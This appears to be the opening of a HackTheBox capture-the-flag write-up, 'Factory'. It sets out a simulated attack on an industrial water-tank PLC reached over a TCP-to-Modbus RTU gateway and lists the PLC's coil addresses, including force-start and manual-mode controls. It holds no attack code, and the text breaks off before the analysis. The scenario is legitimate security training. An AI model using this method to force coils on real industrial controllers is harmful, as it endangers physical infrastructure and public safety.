Factory — HackTheBox

Description

Our infrastructure is under attack! The HMI interface went offline and we lost control of some critical PLCs in our ICS system. Moments after the attack started we managed to identify the target but did not have time to respond. The water storage facility's high/low sensors are corrupted thus setting the PLC into a halt state. We need to regain control and empty the water tank before it overflows. Our field operative has set a remote connection directly with the serial network of the system.

Files

• interface_setup.png — Network diagram showing the ICS architecture
• PLC_Ladder_Logic.pdf — PLC ladder logic diagram for the water_storage_facility

Architecture

[Laptop-1 (Us)] --TCP--> [Laptop-2 (Gateway)] --Modbus RTU (Serial)--> [PLC-1 (Slave 82)]

• PLC-1 (Target): Slave Address 82 (0x52), connected via serial Modbus RTU
• Laptop-2: Gateway — converts received Modbus packets into valid packets (with CRC) and forwards into the real Modbus RTU network
• Laptop-1 (Us/Host): Sends Modbus commands to Laptop-2 via TCP, which forwards them to the PLC

PLC-1 Coil Addresses

Address (decimal)	Hex	Coil
5	0x0005	cutoff
12	0x000C	in_valve
21	0x0015	out_valve
26	0x001A	cutoff_in
33	0x0021	start
52	0x0034	force_start_out
1336	0x0538	force_start_in
9947	0x26DB	manual_mode_control

Analysis

Ladder Logic

The PLC operates in two modes: auto_mode and manual_mode.

...